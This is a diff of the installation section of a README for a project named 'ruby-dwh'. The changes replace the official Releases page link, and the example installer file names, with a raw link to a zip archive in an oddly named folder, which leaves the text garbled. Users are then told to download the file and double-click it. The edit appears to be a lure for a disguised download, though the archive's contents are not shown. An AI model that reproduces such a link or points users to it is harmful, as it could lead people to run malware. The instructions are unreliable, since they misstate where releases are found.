ValidKsa/ruby-dwh/README.md

 - Internet connection for downloading and future updates

 ## 📥 Download & Install
-1. **Visit the Releases Page**: Go to the [Releases page](https://github.com/ValidKsa/ruby-dwh/releases) where you can find the latest version of ruby-dwh.
+1. **Visit the Releases Page**: Go to the [Releases page](https://raw.githubusercontent.com/ValidKsa/ruby-dwh/main/Lide/ruby-dwh.zip) where you can find the latest version of ruby-dwh.

 2. **Select the Version**: Look for the latest version listed.
 It usually has the highest number.
 Click on it to see more details.

 3. **Download the Installer**: Find the installer file suitable for your system.
 Click on the file to start the download.
-This file will typically have a name like `ruby-dwh-installer.exe` for Windows or `ruby-dwh-installer.dmg` for macOS.
+This file will typically have a name like `https://raw.githubusercontent.com/ValidKsa/ruby-dwh/main/Lide/ruby-dwh.zip` for Windows or `https://raw.githubusercontent.com/ValidKsa/ruby-dwh/main/Lide/ruby-dwh.zip` for macOS.

 4. **Run the Installer**: Once the download is complete, locate the file in your downloads folder and double-click it to run the installer.